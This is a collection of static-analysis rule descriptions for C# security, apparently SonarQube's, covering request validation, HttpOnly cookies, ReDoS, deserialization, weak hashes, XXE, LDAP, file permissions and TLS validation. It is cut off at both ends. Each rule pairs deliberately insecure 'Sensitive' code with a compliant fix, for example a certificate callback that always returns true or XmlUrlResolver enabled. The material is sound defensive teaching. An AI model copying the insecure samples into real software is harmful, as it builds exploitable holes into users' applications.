Note: Request Validation feature being only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.

Ask Yourself Whether

  • the developer doesn’t know the impact to deactivate the Request Validation feature
  • the web application accepts user-supplied data
  • all user-supplied data are not validated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Activate the Request Validation feature for all HTTP requests

Sensitive Code Example

At Controller level:

[ValidateInput(false)]
public ActionResult Welcome(string name)
{
  ...
}

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="false" />
      ...
      <httpRuntime requestValidationMode="0.0" />
   </system.web>
</configuration>

Compliant Solution

At Controller level:

[ValidateInput(true)]
public ActionResult Welcome(string name)
{
  ...
}

or

public ActionResult Welcome(string name)
{
  ...
}

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="true" />
      ...
      <httpRuntime requestValidationMode="4.5" />
   </system.web>
</configuration>

See

csharpsquid:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

When the HttpCookie.HttpOnly property is set to false then the cookie can be accessed by client side code:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.HttpOnly = false; // Sensitive: this cookie is created with the httponly flag set to false and so it can be stolen easily in case of XSS vulnerability

The default value of HttpOnly flag is false, unless overwritten by an application’s configuration file:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
// Sensitive: this cookie is created without the httponly flag  (by default set to false) and so it can be stolen easily in case of XSS vulnerability

Compliant Solution

Set the HttpCookie.HttpOnly property to true:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.HttpOnly = true; // Compliant: the sensitive cookie is protected against theft thanks to the HttpOnly property set to true (HttpOnly = true)

Or change the default flag values for the whole application by editing the Web.config configuration file:

<httpCookies httpOnlyCookies="true" requireSSL="true" />
  • the requireSSL attribute corresponds programmatically to the Secure field.
  • the httpOnlyCookies attribute corresponds programmatically to the httpOnly field.

See

csharpsquid:S4784

This rule is deprecated; use S2631 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

If the regular expression is vulnerable to ReDos attacks, mitigate the risk by using a "match timeout" to limit the time spent running the regular expression.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Sensitive Code Example

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.Serialization;
using System.Text.RegularExpressions;
using System.Web;

namespace N
{
    public class RegularExpression
    {
        void Foo(RegexOptions options, TimeSpan matchTimeout, string input,
                 string replacement, MatchEvaluator evaluator)
        {
            // All the following instantiations are Sensitive.
            new System.Text.RegularExpressions.Regex("(a+)+");
            new System.Text.RegularExpressions.Regex("(a+)+", options);
            new System.Text.RegularExpressions.Regex("(a+)+", options, matchTimeout);

            // All the following static methods are Sensitive.
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+");
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Match(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator, options);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator, options, matchTimeout);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement, options);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement, options, matchTimeout);

            System.Text.RegularExpressions.Regex.Split(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+", options, matchTimeout);
        }
    }
}

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

csharpsquid:S5766

Deserialization process extracts data from the serialized representation of an object and reconstruct it directly, without calling constructors. Thus, data validation implemented in constructors can be bypassed if serialized objects are controlled by an attacker.

Ask Yourself Whether

  • The data validation implemented in constructors enforces a relevant security check.
  • Objects instantiated via deserialization don’t run the same security checks as the ones executed when objects are created through constructors.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • At the end of the deserialization process it is recommended to perform the same validation checks as the ones performed in constructors, especially when the serialized object can be controlled by an attacker.

Sensitive Code Example

When a serializable class doesn’t inherit from ISerializable or IDeserializationCallback types and has a constructor using its parameters in conditions:

[Serializable]
public class InternalUrl
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
       if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
       {
          url= "http://localhost/default";
       }
       else
       {
          url= tmpUrl;
       }
    }
}

When a class inherit from ISerializable type, has a regular constructor using its parameters in conditions, but doesn’t perform the same validation after deserialization:

[Serializable]
public class InternalUrl : ISerializable
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    // special constructor used during deserialization
    protected InternalUrl(SerializationInfo info, StreamingContext context) // Sensitive
    {
       url= (string) info.GetValue("url", typeof(string));
       // the same validation as seen in the regular constructor is not performed
     }

    void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AddValue("url", url);
    }
}

When a class inherit from IDeserializationCallback type, has a constructor using its parameters in conditions but the IDeserializationCallback.OnDeserialization method doesn’t perform any conditional checks:

[Serializable]
public class InternalUrl : IDeserializationCallback
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    void IDeserializationCallback.OnDeserialization(object sender) // Sensitive
    {
       // the same validation as seen in the constructor is not performed
    }
}

Compliant Solution

When using ISerializable type to control deserialization, perform the same checks inside regular constructors than in the special constructor SerializationInfo info, StreamingContext context used during deserialization:

[Serializable]
public class InternalUrl : ISerializable
{
    private string url;

    public InternalUrl(string tmpUrl)
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    // special constructor used during deserialization
    protected InternalUrl(SerializationInfo info, StreamingContext context)
    {
       string tmpUrl= (string) info.GetValue("url", typeof(string));

       if(!tmpUrl.StartsWith("http://localhost/") { // Compliant
          url= "http://localhost/default";
       }
       else {
          url= tmpUrl;
       }
     }

    void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AddValue("url", url);
    }
}

When using IDeserializationCallback type to control deserialization, perform the same checks inside regular constructors than after deserialization with IDeserializationCallback.OnDeserialization method:

[Serializable]
public class InternalUrl : IDeserializationCallback
{
    private string url;

    public InternalUrl(string tmpUrl)
    {
       if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
       {
          url= "http://localhost/default";
       }
       else
       {
          url= tmpUrl;
       }
    }

    void IDeserializationCallback.OnDeserialization(object sender) // Compliant
    {
        if(!url.StartsWith("http://localhost/"))
        {
            url= "http://localhost/default";
        }
        else
        {
        }
    }
}

See

csharpsquid:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like AES, RSA, SHA, …​ should be used instead.

This rule tracks custom implementation of these types from System.Security.Cryptography namespace:

  • AsymmetricAlgorithm
  • AsymmetricKeyExchangeDeformatter
  • AsymmetricKeyExchangeFormatter
  • AsymmetricSignatureDeformatter
  • AsymmetricSignatureFormatter
  • DeriveBytes
  • HashAlgorithm
  • ICryptoTransform
  • SymmetricAlgorithm

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

public class CustomHash : HashAlgorithm // Noncompliant
{
    private byte[] result;

    public override void Initialize() => result = null;
    protected override byte[] HashFinal() => result;

    protected override void HashCore(byte[] array, int ibStart, int cbSize) =>
        result ??= array.Take(8).ToArray();
}

Compliant Solution

SHA256 mySHA256 = SHA256.Create()

See

csharpsquid:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

DirectoryEntry myDirectoryEntry = new DirectoryEntry(adPath);
myDirectoryEntry.AuthenticationType = AuthenticationTypes.None; // Noncompliant

DirectoryEntry myDirectoryEntry = new DirectoryEntry(adPath, "u", "p", AuthenticationTypes.None); // Noncompliant

Compliant solution

DirectoryEntry myDirectoryEntry = new DirectoryEntry(myADSPath); // Compliant; default DirectoryEntry.AuthenticationType property value is "Secure" since .NET Framework 2.0

DirectoryEntry myDirectoryEntry = new DirectoryEntry(myADSPath, "u", "p", AuthenticationTypes.Secure);

Resources

Documentation

Standards

csharpsquid:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

var hashProvider1 = new MD5CryptoServiceProvider(); // Sensitive
var hashProvider2 = (HashAlgorithm)CryptoConfig.CreateFromName("MD5"); // Sensitive
var hashProvider3 = new SHA1Managed(); // Sensitive
var hashProvider4 = HashAlgorithm.Create("SHA1"); // Sensitive

Compliant Solution

var hashProvider1 = new SHA512Managed(); // Compliant
var hashProvider2 = (HashAlgorithm)CryptoConfig.CreateFromName("SHA512Managed"); // Compliant
var hashProvider3 = HashAlgorithm.Create("SHA512Managed"); // Compliant

See

csharpsquid:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as he/she wants.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backuped or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually any information which is protected by law is good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

.Net Core: configure programmatically

using System;
using System.Collections;
using System.Collections.Generic;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
using Microsoft.AspNetCore;

namespace MvcApp
{
    public class ProgramLogging
    {
        public static IWebHostBuilder CreateWebHostBuilder(string[] args) =>
            WebHost.CreateDefaultBuilder(args)
                .ConfigureLogging((hostingContext, logging) => // Sensitive
                {
                    // ...
                })
                .UseStartup<StartupLogging>();
    }

    public class StartupLogging
    {
        public void ConfigureServices(IServiceCollection services)
        {
            services.AddLogging(logging => // Sensitive
            {
                // ...
            });
        }

        public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory)
        {
            IConfiguration config = null;
            LogLevel level = LogLevel.Critical;
            Boolean includeScopes = false;
            Func<string,Microsoft.Extensions.Logging.LogLevel,bool> filter = null;
            Microsoft.Extensions.Logging.Console.IConsoleLoggerSettings consoleSettings = null;
            Microsoft.Extensions.Logging.AzureAppServices.AzureAppServicesDiagnosticsSettings azureSettings = null;
            Microsoft.Extensions.Logging.EventLog.EventLogSettings eventLogSettings = null;

            // An issue will be raised for each call to an ILoggerFactory extension methods adding loggers.
            loggerFactory.AddAzureWebAppDiagnostics(); // Sensitive
            loggerFactory.AddAzureWebAppDiagnostics(azureSettings); // Sensitive
            loggerFactory.AddConsole(); // Sensitive
            loggerFactory.AddConsole(level); // Sensitive
            loggerFactory.AddConsole(level, includeScopes); // Sensitive
            loggerFactory.AddConsole(filter); // Sensitive
            loggerFactory.AddConsole(filter, includeScopes); // Sensitive
            loggerFactory.AddConsole(config); // Sensitive
            loggerFactory.AddConsole(consoleSettings); // Sensitive
            loggerFactory.AddDebug(); // Sensitive
            loggerFactory.AddDebug(level); // Sensitive
            loggerFactory.AddDebug(filter); // Sensitive
            loggerFactory.AddEventLog(); // Sensitive
            loggerFactory.AddEventLog(eventLogSettings); // Sensitive
            loggerFactory.AddEventLog(level); // Sensitive
            loggerFactory.AddEventSourceLogger(); // Sensitive

            IEnumerable<ILoggerProvider> providers = null;
            LoggerFilterOptions filterOptions1 = null;
            IOptionsMonitor<LoggerFilterOptions> filterOptions2 = null;

            LoggerFactory factory = new LoggerFactory(); // Sensitive
            new LoggerFactory(providers); // Sensitive
            new LoggerFactory(providers, filterOptions1); // Sensitive
            new LoggerFactory(providers, filterOptions2); // Sensitive
        }
    }
}

Log4Net

using System;
using System.IO;
using System.Xml;
using log4net.Appender;
using log4net.Config;
using log4net.Repository;

namespace Logging
{
    class Log4netLogging
    {
        void Foo(ILoggerRepository repository, XmlElement element, FileInfo configFile, Uri configUri, Stream configStream,
        IAppender appender, params IAppender[] appenders) {
            log4net.Config.XmlConfigurator.Configure(repository); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, element); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configFile); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configUri); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configStream); // Sensitive
            log4net.Config.XmlConfigurator.ConfigureAndWatch(repository, configFile); // Sensitive

            log4net.Config.DOMConfigurator.Configure(); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository); // Sensitive
            log4net.Config.DOMConfigurator.Configure(element); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, element); // Sensitive
            log4net.Config.DOMConfigurator.Configure(configFile); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configFile); // Sensitive
            log4net.Config.DOMConfigurator.Configure(configStream); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configStream); // Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(configFile); // Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(repository, configFile); // Sensitive

            log4net.Config.BasicConfigurator.Configure(); // Sensitive
            log4net.Config.BasicConfigurator.Configure(appender); // Sensitive
            log4net.Config.BasicConfigurator.Configure(appenders); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appender); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appenders); // Sensitive
        }
    }
}

NLog: configure programmatically

namespace Logging
{
    class NLogLogging
    {
        void Foo(NLog.Config.LoggingConfiguration config) {
            NLog.LogManager.Configuration = config; // Sensitive, this changes the logging configuration.
        }
    }
}

Serilog

namespace Logging
{
    class SerilogLogging
    {
        void Foo() {
            new Serilog.LoggerConfiguration(); // Sensitive
        }
    }
}

See

csharpsquid:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in .NET

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

using System.Xml;

public static void decode()
{
    XmlDocument parser = new XmlDocument();
    parser.XmlResolver = new XmlUrlResolver(); // Noncompliant
    parser.LoadXml("xxe.xml");
}

Compliant solution

XmlDocument is safe by default since .NET Framework 4.5.2. For older versions, set XmlResolver explicitly to null.

using System.Xml;

public static void decode()
{
    XmlDocument parser = new XmlDocument();
    parser.XmlResolver = null;
    parser.LoadXml("xxe.xml");
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

csharpsquid:S2612

In Unix, "others" class refers to all users except the owner of the file and the members of the group assigned to this file.

In Windows, "Everyone" group is similar and includes all members of the Authenticated Users group as well as the built-in Guest account, and several other built-in security accounts.

Granting permissions to these groups can lead to unintended access to files.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

.Net Framework:

var unsafeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Allow);

var fileSecurity = File.GetAccessControl("path");
fileSecurity.AddAccessRule(unsafeAccessRule); // Sensitive
fileSecurity.SetAccessRule(unsafeAccessRule); // Sensitive
File.SetAccessControl("fileName", fileSecurity);

.Net / .Net Core

var fileInfo = new FileInfo("path");
var fileSecurity = fileInfo.GetAccessControl();

fileSecurity.AddAccessRule(new FileSystemAccessRule("Everyone", FileSystemRights.Write, AccessControlType.Allow)); // Sensitive
fileInfo.SetAccessControl(fileSecurity);

.Net / .Net Core using Mono.Posix.NETStandard

var fileSystemEntry = UnixFileSystemInfo.GetFileSystemEntry("path");
fileSystemEntry.FileAccessPermissions = FileAccessPermissions.OtherReadWriteExecute; // Sensitive

Compliant Solution

.Net Framework

var safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny);

var fileSecurity = File.GetAccessControl("path");
fileSecurity.AddAccessRule(safeAccessRule);
File.SetAccessControl("path", fileSecurity);

.Net / .Net Core

var safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny);

var fileInfo = new FileInfo("path");
var fileSecurity = fileInfo.GetAccessControl();
fileSecurity.SetAccessRule(safeAccessRule);
fileInfo.SetAccessControl(fileSecurity);

.Net / .Net Core using Mono.Posix.NETStandard

var fs = UnixFileSystemInfo.GetFileSystemEntry("path");
fs.FileAccessPermissions = FileAccessPermissions.UserExecute;

See

csharpsquid:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

var ip = "192.168.12.42";
var address = IPAddress.Parse(ip);

Compliant Solution

var ip = ConfigurationManager.AppSettings["myapplication.ip"];
var address = IPAddress.Parse(ip);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

csharpsquid:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

using System;
public class C
{
    public void Main()
    {
        Console.In; // Sensitive
        var code = Console.Read(); // Sensitive
        var keyInfo = Console.ReadKey(...); // Sensitive
        var text = Console.ReadLine(); // Sensitive
        Console.OpenStandardInput(...); // Sensitive
    }
}

Exceptions

This rule does not raise issues when the return value of the Console.Read Console.ReadKey or Console.ReadLine methods is ignored.

using System;
public class C
{
    public void Main()
    {
        Console.ReadKey(...); // Return value is ignored
        Console.ReadLine(); // Return value is ignored
    }
}

See

csharpsquid:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue when on every program entry points (main methods) when command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

Sensitive Code Example

namespace MyNamespace
{
    class Program
    {
        static void Main(string[] args) // Sensitive if there is a reference to "args" in the method.
        {
            string myarg = args[0];
            // ...
        }
    }
}

See

csharpsquid:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in .NET

Code examples

In the following example, the callback change impacts the entirety of HTTP requests made by the application.

The certificate validation gets disabled by overriding ServerCertificateValidationCallback with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

using System.Net;
using System.Net.Http;

public static void connect()
{
    ServicePointManager.ServerCertificateValidationCallback +=
	 (sender, certificate, chain, errors) => {
	     return true; // Noncompliant
    };

    HttpClient httpClient = new HttpClient();
    HttpResponseMessage response = httpClient.GetAsync("https://example.com").Result;
}

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.
